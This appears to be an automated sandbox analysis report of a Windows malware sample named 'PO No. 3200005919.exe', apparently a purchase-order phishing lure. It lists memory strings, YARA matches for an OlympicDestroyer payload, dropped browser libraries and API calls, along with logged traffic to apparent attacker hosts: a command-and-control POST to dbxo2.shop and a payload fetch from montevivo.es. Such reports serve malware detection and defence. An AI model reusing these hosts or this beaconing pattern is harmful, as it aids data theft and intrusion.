                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                    Source: 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com/
                    Source: PO No. 3200005919.exe, 00000005.00000003.7217109993.0000000001803000.00000004.00000020.00020000.00000000.sdmp, 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com//
                    Source: 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com/https://login.live.com/
                    Source: PO No. 3200005919.exe, 00000005.00000003.7217109993.0000000001803000.00000004.00000020.00020000.00000000.sdmp, 382858288932396262502121.tmp.5.drString found in binary or memory: https://login.live.com/v104
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.drString found in binary or memory: https://mozilla.org0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: unknownHTTP traffic detected: POST /dbx2/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo2.shopContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 10 8b 30 64 ef 26 66 97 26 66 9d 42 70 9d 37 70 9d 36 70 9c 47 70 9d 35 70 9d 37 70 9d 33 13 ec 26 66 9a 26 66 9e 26 66 98 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0d&f&fBp7p6pGp5p7p3&f&f&f
                    Source: unknownDNS traffic detected: queries for: montevivo.es
                    Source: global trafficHTTP traffic detected: GET /lPkFJXszrxOMoP0.hhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: montevivo.esCache-Control: no-cache
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405553

                    System Summary

                    barindex
                    Source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: PO No. 3200005919.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403489
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Windows\leprousness.lnkJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00404D901_2_00404D90
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00406ABA1_2_00406ABA
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412040B1_2_0412040B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128C0B1_2_04128C0B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126C231_2_04126C23
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412045A1_2_0412045A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126C431_2_04126C43
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04124C961_2_04124C96
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412C48A1_2_0412C48A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041274A31_2_041274A3
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041204E01_2_041204E0
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126D151_2_04126D15
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412053A1_2_0412053A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041205931_2_04120593
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041205DE1_2_041205DE
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041275C91_2_041275C9
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041206251_2_04120625
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126E661_2_04126E66
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04141EE61_2_04141EE6
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412071B1_2_0412071B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041447341_2_04144734
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0413FF6B1_2_0413FF6B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041207921_2_04120792
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126F9D1_2_04126F9D
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041207D51_2_041207D5
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041427C41_2_041427C4
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412081F1_2_0412081F
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041200011_2_04120001
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041200061_2_04120006
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041220311_2_04122031
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041208851_2_04120885
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041270D81_2_041270D8
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041200CA1_2_041200CA
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041208F61_2_041208F6
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041200E11_2_041200E1
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041270E11_2_041270E1
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041289541_2_04128954
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041201581_2_04120158
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412817D1_2_0412817D
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041209931_2_04120993
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041281A41_2_041281A4
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041209D91_2_041209D9
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128A171_2_04128A17
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120A2B1_2_04120A2B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04120A7A1_2_04120A7A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04127AB11_2_04127AB1
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0413FAB71_2_0413FAB7
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128ADD1_2_04128ADD
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041202C01_2_041202C0
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041432EB1_2_041432EB
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412037C1_2_0412037C
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041203951_2_04120395
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04124BBC1_2_04124BBC
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04128BBD1_2_04128BBD
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04126BD81_2_04126BD8
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 5_2_0168489C5_2_0168489C
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04145617 NtResumeThread,1_2_04145617
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041443B0 NtProtectVirtualMemory,1_2_041443B0
                    Source: api-ms-win-core-synch-l1-2-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-string-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-debug-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-handle-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-memory-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-utility-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-heap-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-runtime-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-console-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-string-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l2-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-localization-l1-2-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-2-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-libraryloader-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-private-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-datetime-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-namedpipe-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-time-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-multibyte-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-stdio-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processenvironment-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-interlocked-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameqipcap.dll8 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWMIMethod.dllL vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameqipcap.dll8 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197956244.000000001E6B4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7164106750.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7155669494.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7280858464.000000001E270000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
